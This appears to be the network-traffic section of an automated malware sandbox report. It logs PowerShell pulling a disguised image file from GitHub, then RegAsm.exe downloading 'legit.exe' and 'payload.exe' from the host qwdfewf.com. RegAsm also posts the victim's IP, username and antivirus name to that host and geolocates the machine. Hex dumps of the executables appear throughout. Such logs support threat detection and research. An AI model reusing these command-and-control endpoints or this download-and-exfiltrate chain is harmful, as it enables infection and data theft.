                                                                                                                                                                                        • api.ipify.org
                                                                                                                                                                                        • qwdfewf.com
                                                                                                                                                                                        • geoplugin.net
                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.949782104.26.12.205807856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Oct 10, 2024 13:39:42.772506952 CEST58OUTGET / HTTP/1.1
                                                                                                                                                                                        User-Agent: GetIP
                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                        Oct 10, 2024 13:39:43.227567911 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Thu, 10 Oct 2024 11:39:43 GMT
                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                        Content-Length: 11
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8d0654dad94f4289-EWR
                                                                                                                                                                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                        Data Ascii: 8.46.123.33


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.949789185.185.71.79807856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Oct 10, 2024 13:39:43.694684982 CEST105OUTGET /dwn_legit_file HTTP/1.1
                                                                                                                                                                                        User-Agent: File Downloader
                                                                                                                                                                                        Host: qwdfewf.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468162060 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                        server: gunicorn
                                                                                                                                                                                        date: Thu, 10 Oct 2024 11:39:44 GMT
                                                                                                                                                                                        content-disposition: inline; filename=legit.exe
                                                                                                                                                                                        content-type: application/x-msdos-program
                                                                                                                                                                                        content-length: 1308110
                                                                                                                                                                                        last-modified: Thu, 10 Oct 2024 11:37:18 GMT
                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                        etag: "1728560238.9919808-1308110-3772517616"
                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 11 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b [TRUNCATED]
                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOnB8@ @4@ fh(d.textmn `.rdatab*,r@@.data~@.ndata0.rsrc @@@.reloc2@B
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468197107 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii: U\}t+}FEuH-GHPuuu@KSV5-GWEPu@eEEPu@}eD@FRVVU
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468233109 CEST1236INData Raw: 8b cf 2b 4d e8 0f af c1 03 c2 99 f7 ff 89 4d 10 0f b6 c0 c1 e0 08 89 45 14 0f b6 46 51 0f af c1 0f b6 4e 55 0f af 4d e8 03 c1 99 f7 ff 8b 4d 14 0f b6 56 54 0f af 55 e8 0f b6 c0 0b c8 0f b6 46 50 0f af 45 10 03 c2 99 f7 ff c1 e1 08 0f b6 c0 0b c8
                                                                                                                                                                                        Data Ascii: +MMEFQNUMMVTUFPEEPMH@EPEEPu@uE9}n~Xtev4L@EtU}jWEEP@vXWT@u5X@Wh EEPjhFW@uWuE
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468283892 CEST1236INData Raw: 55 8b ec a1 c4 b0 40 00 8b 40 04 56 85 c0 74 04 8b f0 eb 0c 8b 35 84 2e 47 00 81 c6 01 00 00 80 8d 45 08 50 a1 b0 2e 47 00 0b 45 08 50 6a 00 6a 22 e8 d3 fe ff ff 50 56 ff 15 04 80 40 00 f7 d8 1b c0 f7 d0 23 45 08 5e 5d c2 04 00 cc 55 8b ec 81 ec
                                                                                                                                                                                        Data Ascii: U@@Vt5.GEP.GEPjj"PV@#E^]U-GSVuWjY}UMi@i@E0GE@E3]G$0@Rh@LEYYS@Ph@|LYYSu@9F9]t
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468338013 CEST1236INData Raw: f0 8b 45 d4 8b c8 c1 f8 03 56 83 e0 02 83 e1 07 50 51 68 d8 8b 40 00 89 75 cc 89 4d 08 e8 5a 48 00 00 83 c4 10 56 e8 d3 42 00 00 56 be c8 b0 40 00 85 c0 74 08 56 e8 a7 45 00 00 eb 17 68 b0 b0 4c 00 56 e8 9a 45 00 00 50 e8 ad 4c 00 00 50 e8 aa 45
                                                                                                                                                                                        Data Ascii: EVPQh@uMZHVBV@tVEhLVEPLPEVE0A}|1VCH3;tMQPd@E#@E9]uVhC3}@Ph@VrCE9]uwVh@GYYh0GWEVh0GDuh@
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468374014 CEST672INData Raw: be c8 b0 40 00 56 e8 03 41 00 00 a1 c0 b0 40 00 83 c0 04 50 57 e8 f4 40 00 00 a1 c0 b0 40 00 56 83 c0 04 50 e9 27 0f 00 00 3b cb 74 2b 3b fb 75 10 68 d0 89 40 00 e8 6d 43 00 00 59 e9 d7 fa ff ff 8d 47 04 50 56 e8 c3 40 00 00 8b 07 a3 c0 b0 40 00
                                                                                                                                                                                        Data Ascii: @VA@PW@@VP';t+;uh@mCYGPV@@W4h@j@$@uFPH@5@cjYjYEEEtj3EEtjDE}!uJ3AjYxM;tURQSuuPWL@
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468406916 CEST1236INData Raw: 5d e0 75 0b ff 15 44 82 40 00 e9 39 0f 00 00 ff 15 80 82 40 00 e9 2e 0f 00 00 53 e8 a1 f2 ff ff 6a 31 8b f0 e8 98 f2 ff ff 6a 22 8b d8 e8 8f f2 ff ff 6a 15 8b f8 e8 86 f2 ff ff 68 d0 f0 40 00 6a ec e8 90 2d 00 00 0f b7 07 ff 75 e0 f7 d8 1b c0 23
                                                                                                                                                                                        Data Ascii: ]uD@9@.Sj1j"jh@j-u#hLPS#Pu@!}PWSVh@@@WSVh@s@SVh@X@YYVj-V9EV;t_h@6@YY9]tF5(@j@jdu=
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468441010 CEST1236INData Raw: e8 e8 ed ff ff 6a 23 8b f8 e8 df ed ff ff 57 56 68 ec 85 40 00 89 45 08 e8 17 3c 00 00 83 c4 0c 56 e8 40 3c 00 00 85 c0 75 0d 53 6a f9 e8 d1 28 00 00 e9 6d f3 ff ff 8b 45 f4 56 89 45 a4 c7 45 a8 02 00 00 00 e8 66 39 00 00 33 c9 57 66 89 4c 46 02
                                                                                                                                                                                        Data Ascii: j#WVh@E<V@<uSj(mEVEEf93WfLFY93fLGEfMPSu}EfM(EP@.Gh@@V]]]8V0AW89]tSE9]tjE9]tj"
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468473911 CEST1236INData Raw: 08 88 01 33 c0 40 eb 25 6a 11 e8 0a e9 ff ff 53 53 57 ff 75 08 6a ff 68 d0 f0 40 00 53 53 ff 15 48 81 40 00 ff 75 08 ff 15 4c 81 40 00 66 39 1e 74 1e 53 8d 4d bc 51 50 ff 75 08 56 e8 e6 33 00 00 50 ff 15 54 81 40 00 85 c0 0f 85 f1 f7 ff ff c7 45
                                                                                                                                                                                        Data Ascii: 3@%jSSWujh@SSH@uL@f9tSMQPuV3PT@EjYE0 ;~Mf9V]3E9]SEPjEPuX@}u|9]u9jEPjEPSS\@E<t.<t*fEfwEFE:
                                                                                                                                                                                        Oct 10, 2024 13:39:44.468517065 CEST1236INData Raw: ff 75 e4 8d 46 18 50 e8 e2 37 00 00 81 4e 08 00 01 00 00 8b 45 dc 8b 4d d8 89 0c 86 39 5d e0 0f 84 a7 00 00 00 ff 75 08 e8 42 e1 ff ff e9 9a 00 00 00 33 c9 e8 f6 e3 ff ff 83 f8 20 0f 83 ba e9 ff ff 39 5d e0 74 1f 39 5d dc 74 0f 50 e8 3d e2 ff ff
                                                                                                                                                                                        Data Ascii: uFP7NEM9]uB3 9]t9]tP=SSqSyR9]tM-GO-GW^7:trES#Pju@9]t!SSu@jP2PVn.E.G3_^[I@@<@P@r
                                                                                                                                                                                        Oct 10, 2024 13:39:44.473591089 CEST1236INData Raw: 75 f8 8b 1d 78 31 43 00 83 7d f0 01 0f 85 3c ff ff ff eb 37 39 45 14 0f 8f 05 ff ff ff eb 2c 6a fc e9 c3 fe ff ff 6a fe e9 bc fe ff ff 85 ff 74 63 39 75 14 7d 03 8b 75 14 56 57 e8 0b fe ff ff 85 c0 0f 84 9f fe ff ff 89 75 fc 8b 45 fc 5f 5e 5b c9
                                                                                                                                                                                        Data Ascii: ux1C}<79E,jjtc9u}uVWuE_^[u9u}uVPAWsjEPVWuT@t;uuu)u}U(SV3W]]@h MVS .G@jhV(}=@u@
                                                                                                                                                                                        Oct 10, 2024 13:39:45.698507071 CEST107OUTGET /dwn_payload_file HTTP/1.1
                                                                                                                                                                                        User-Agent: File Downloader
                                                                                                                                                                                        Host: qwdfewf.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Oct 10, 2024 13:39:46.002621889 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                        server: gunicorn
                                                                                                                                                                                        date: Thu, 10 Oct 2024 11:39:45 GMT
                                                                                                                                                                                        content-disposition: inline; filename=payload.exe
                                                                                                                                                                                        content-type: application/x-msdos-program
                                                                                                                                                                                        content-length: 184320
                                                                                                                                                                                        last-modified: Thu, 10 Oct 2024 08:56:01 GMT
                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                        etag: "1728550561.2642286-184320-4239461829"
                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 9b 4b 72 c2 fa 25 21 c2 fa 25 21 c2 fa 25 21 26 8a 20 20 c3 fa 25 21 26 8a 26 20 c1 fa 25 21 26 8a 21 20 d1 fa 25 21 26 8a 24 20 d3 fa 25 21 c2 fa 24 21 62 fa 25 21 26 8a 2d 20 c8 fa 25 21 26 8a da 21 c3 fa 25 21 26 8a 27 20 c3 fa 25 21 52 69 63 68 c2 fa 25 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 b4 79 8c e2 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1a 00 80 00 00 00 40 02 00 00 00 00 00 60 84 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 10 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 e0 02 00 00 10 00 00 22 30 03 00 02 00 60 c1 00 00 08 00 00 00 00 00 00 20 [TRUNCATED]
                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Kr%!%!%!& %!&& %!&! %!&$ %!$!b%!&- %!&!%!&' %!Rich%!PEdy"@`@"0` ,,hT8H .text@~ `.rdata@#0@@.data@.pdata,@@.rsrc@@.reloc,@B
                                                                                                                                                                                        Oct 10, 2024 13:39:51.903724909 CEST279OUTPOST /reg_auth_machine HTTP/1.1
                                                                                                                                                                                        Content-Type: */*
                                                                                                                                                                                        User-Agent: Mozilla FF
                                                                                                                                                                                        Host: qwdfewf.com
                                                                                                                                                                                        Content-Length: 136
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Data Raw: 7b 22 49 50 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 20 22 55 53 45 52 4e 41 4d 45 22 3a 20 22 74 69 6e 61 22 2c 20 22 4c 41 4e 47 55 41 47 45 22 3a 20 22 65 6e 22 2c 20 22 41 4e 54 49 56 49 52 55 53 22 3a 20 22 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 22 2c 20 22 55 55 49 44 22 3a 20 22 39 64 53 50 48 6d 4f 53 39 6d 49 63 47 56 54 36 52 62 58 4e 61 6d 63 37 58 54 35 46 63 57 57 6d 22 7d
                                                                                                                                                                                        Data Ascii: {"IP": "8.46.123.33", "USERNAME": "user", "LANGUAGE": "en", "ANTIVIRUS": "Windows Defender", "UUID": "9dSPHmOS9mIcGVT6RbXNamc7XT5FcWWm"}
                                                                                                                                                                                        Oct 10, 2024 13:39:52.216526031 CEST135INHTTP/1.1 200 OK
                                                                                                                                                                                        server: gunicorn
                                                                                                                                                                                        date: Thu, 10 Oct 2024 11:39:52 GMT
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-length: 2
                                                                                                                                                                                        Data Raw: 4f 4b
                                                                                                                                                                                        Data Ascii: OK


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.949904178.237.33.50807660C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Oct 10, 2024 13:40:01.594475031 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Oct 10, 2024 13:40:02.199177980 CEST1170INHTTP/1.1 200 OK
                                                                                                                                                                                        date: Thu, 10 Oct 2024 11:40:02 GMT
                                                                                                                                                                                        server: Apache
                                                                                                                                                                                        content-length: 962
                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.949736185.199.110.1334437696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-10 11:39:36 UTC117OUTGET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1
                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-10-10 11:39:36 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 2578503
                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                        ETag: "ba4b733aa1ad403bc9cacb2a172994a886bea7b08e7a7dfb33ae1618861cbf3e"
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        X-GitHub-Request-Id: EF8C:D4BA7:61E47E:694A5F:6707B6AB
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Date: Thu, 10 Oct 2024 11:39:36 GMT
                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740064-EWR
                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                        X-Timer: S1728560376.300104,VS0,VE99
                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                        X-Fastly-Request-ID: b4dd4175aba7b70ffc75043cec346b4b859913c7
                                                                                                                                                                                        Expires: Thu, 10 Oct 2024 11:44:36 GMT
                                                                                                                                                                                        Source-Age: 0
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01
                                                                                                                                                                                        Data Ascii: JFIF,,ExifMM*CCp"_!
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: 24 18 1e 91 51 6f 5a c4 83 c0 9a 67 14 d0 b7 13 58 bc c9 51 49 0b 24 fe 82 ac 98 bc c8 5a 09 07 9e dc d5 02 dd e2 d3 9d e0 fd 4d 4e e3 ef c0 48 f3 07 cc 71 55 ad a7 82 c4 2d 34 4c 65 ef 88 13 f3 00 a1 c8 9a 9b c6 e4 4a 09 2a 50 93 c5 67 b8 dc d4 04 93 bb 81 e6 6a 7a cb 32 1c 03 9e 3b 1a ca bb 4b f2 5c ae ec 17 66 6f d2 e2 c9 07 81 db 9a 77 6d 91 9e 27 81 ef 55 16 72 68 20 6d 51 e0 53 db 5c 9e c5 70 7b f7 ac eb 34 a5 c8 5c 99 72 b6 c9 a5 6a 09 dd 13 db 9a 92 b1 c8 04 b8 08 51 1e 51 35 4d b4 c9 25 6a 32 44 cf 11 52 56 b9 12 81 24 f3 ea 6b 3e dd 31 34 6d 45 da cf 20 82 a0 24 26 7d 2a 4e de e4 00 40 33 f9 d5 22 cb 2a 54 52 b2 b1 c1 a9 cc 7e 60 38 90 24 92 0f 27 da b3 ed d3 63 82 c2 b0 b2 b6 f9 09 10 7b 89 26 69 eb 37 90 00 2a 9e 3e 95 5f 62 ed 25 00 85 73 e5
                                                                                                                                                                                        Data Ascii: $QoZgXQI$ZMNHqU-4LeJ*Pgjz2;K\fowm'Urh mQS\p{4\rjQQ5M%j2DRV$k>14mE $&}*N@3"*TR~`8$'c{&i7*>_b%s
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: d3 36 fb 95 ce d3 e7 dc d1 db 67 fa 7c 8f 9d 42 e5 82 45 1c 8d 9a b4 51 50 e6 38 a5 3e e4 4a 7c b9 ef ef 4f 19 68 25 24 9f 2e dc d1 cb 32 92 02 b7 03 dc 11 11 4d 91 da c7 04 63 d6 9c 92 08 ef 13 4c ee 99 da 24 80 ae fd 8d 4a dc 32 12 83 c7 3d a3 bd 47 df c0 90 0c 77 f6 a9 ea 7d 88 e5 f8 2b 59 44 43 ca 06 15 35 0e f3 24 dc 42 40 ef 56 1c 9b 33 bb 90 66 a2 14 d0 4a b9 24 41 e6 2b 42 a9 60 83 01 98 64 18 22 02 92 3f 4a 92 b2 b5 da 67 ba 7b c7 95 34 b7 46 e5 90 07 35 25 6a df 1e fe d4 ac 7c 88 70 cb 13 12 39 fa d4 a5 83 40 24 13 c1 9a 67 6e 81 c9 90 94 f1 52 56 ed a4 01 04 89 20 fe 95 42 d6 4d 0e e4 a6 3f 97 01 3c c1 e0 d4 e6 39 3f cc 9d c4 8f 7a 81 b3 3b 52 23 cf f2 a9 9c 59 da b1 ef 59 97 47 25 98 48 b0 32 90 1a 04 7f ed a3 bc 99 41 88 07 d6 9b 5b bf bd 20
                                                                                                                                                                                        Data Ascii: 6g|BEQP8>J|Oh%$.2McL$J2=Gw}+YDC5$B@V3fJ$A+B`d"?Jg{4F5%j|p9@$gnRV BM?<9?z;R#YYG%H2A[
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: 8e 4a 64 d7 92 d8 9e f0 45 33 42 12 f0 c9 23 88 9f 78 a3 a2 dc 92 78 fd e9 54 b4 24 19 3f 4a 55 b6 b6 aa 3f 3a 61 2e e3 74 5b 13 27 b7 95 1c 5b d3 94 b1 c7 3c c7 bd 1d 0c 00 a1 00 8a 61 f0 34 16 b0 8f 51 33 47 4b 45 24 1e 38 e3 eb 4e 9b b6 fa 8f de 8c 2d 79 fe 93 f5 a6 ca 1d 44 41 0c 00 92 3c cc d3 86 d9 26 38 ef 47 43 1e 7e 54 b2 59 00 8e 60 9a 8e 4c 20 5b 66 12 27 bd 2c da 4e d1 20 40 f7 af 36 80 90 47 04 fb 9e d4 a3 68 fe 58 93 1e f5 14 98 85 19 1c cf 03 e9 4a 34 9e 3d 7d 3e 94 54 20 05 7e 5e bc 52 ed 08 1c 77 a8 98 85 52 9f 98 79 4d 2e d9 db 3e 54 92 47 cf f9 52 81 3f 28 f5 91 4c 21 64 02 76 82 4f d6 3b 52 cd 88 4c 70 07 bd 26 d2 78 1f 48 a5 d9 4c 9f 38 ef 4b 3e 07 4c 59 a4 46 de 07 f9 52 88 68 11 07 88 33 e9 45 68 02 07 a8 a5 db 4c 02 01 35 13 ee 12
                                                                                                                                                                                        Data Ascii: JdE3B#xxT$?JU?:a.t['[<a4Q3GKE$8N-yDA<&8GC~TY`L [f',N @6GhXJ4=}>T ~^RwRyM.>TGR?(L!dvO;RLp&xHL8K>LYFRh3EhL5
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: 95 3f 71 a0 a0 48 ef f5 a6 eb 42 52 0f 3c 1e e6 6a 64 c6 19 b8 90 90 67 f4 f2 a4 96 ce d8 e0 71 c5 3b 5b 61 20 9f 23 c0 a4 d6 d0 28 10 7c fb cd 16 46 68 68 b6 41 41 f9 79 f4 9e d4 9a 98 f2 20 03 dc 0a 78 a6 46 d2 00 04 0f 32 4d 26 e3 5b bb 00 67 f6 a2 c8 29 7c 8d 14 d9 90 08 04 1e 68 a5 8e f1 00 27 9a 74 2d c8 32 41 8f 28 f2 af 1b 71 23 eb cd 3e e1 34 35 f0 26 47 12 3d 3c e8 a1 93 b4 f0 29 e1 b7 f9 b8 3d bb f1 44 5b 69 4a 79 54 d2 c8 d8 1a 86 bf 98 78 1c 9a 21 47 ca 0c f7 34 ec b7 24 41 fa 99 e0 d1 54 da 60 fa 0a 25 2f 91 f0 86 c1 82 7b 89 99 ee 68 85 8d d3 f5 a7 7f 77 24 9e 3c a2 7d 6b ce 31 02 79 81 4e 98 b0 30 fb b6 d5 a7 ce 8a ab 7d 80 9f 39 fd 29 f1 64 2d 5c 72 12 68 0b 30 4c f6 34 fb 86 23 9e 60 01 c8 1c 7b 52 4b 60 02 60 77 fa f1 52 6e 5b ed 20 77
                                                                                                                                                                                        Data Ascii: ?qHBR<jdgq;[a #(|FhhAAy xF2M&[g)|h't-2A(q#>45&G=<)=D[iJyTx!G4$AT`%/{hw$<}k1yN0}9)d-\rh0L4#`{RK``wRn[ w
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: 3e b6 70 73 07 cb 9a 8e 6d 44 79 4d 38 b7 70 c4 81 07 fb d4 6d 06 4b 5a be 5b 3c 49 9e 40 9a 9e c5 27 e5 49 51 12 07 61 55 76 6e 36 41 1e 5e 95 31 8f bf de 90 07 11 e8 6a bd 8b e0 24 c9 f1 0a 71 04 76 3d c5 3e b6 64 a8 48 24 01 e9 51 b8 fb b4 ba be 47 20 7a d4 8b 4f 04 98 98 3f 5a 81 a6 10 f4 38 10 60 99 a2 15 00 66 7b f3 49 3a ec f1 27 f2 ed 44 2e 84 cc 77 a8 c9 32 1d d5 02 a9 f2 3c 53 75 10 41 f2 22 85 6e 40 04 77 f7 a4 d6 e6 e1 db bf 07 da 90 84 d6 42 79 3e 73 34 92 d4 53 13 dc 8e d4 67 7f 01 e4 71 48 ba a9 51 24 89 ed 1e b4 84 11 c5 cc 9a 49 c5 03 04 9e dc 51 d6 24 11 c5 22 e7 2a 1c 0f d6 90 32 00 ae 24 99 91 e5 49 a9 41 07 82 4c 9f 5a f1 30 99 9e 4d 26 a5 98 82 3b d1 a5 80 41 71 72 a3 c9 fd 68 8b 7a 04 49 8a 05 9d d3 fa f1 49 19 0a 04 76 f5 f4 a2 4b
                                                                                                                                                                                        Data Ascii: >psmDyM8pmKZ[<I@'IQaUvn6A^1j$qv=>dH$QG zO?Z8`f{I:'D.w2<SuA"n@wBy>s4SgqHQ$IQ$"*2$IALZ0M&;AqrhzIIvK
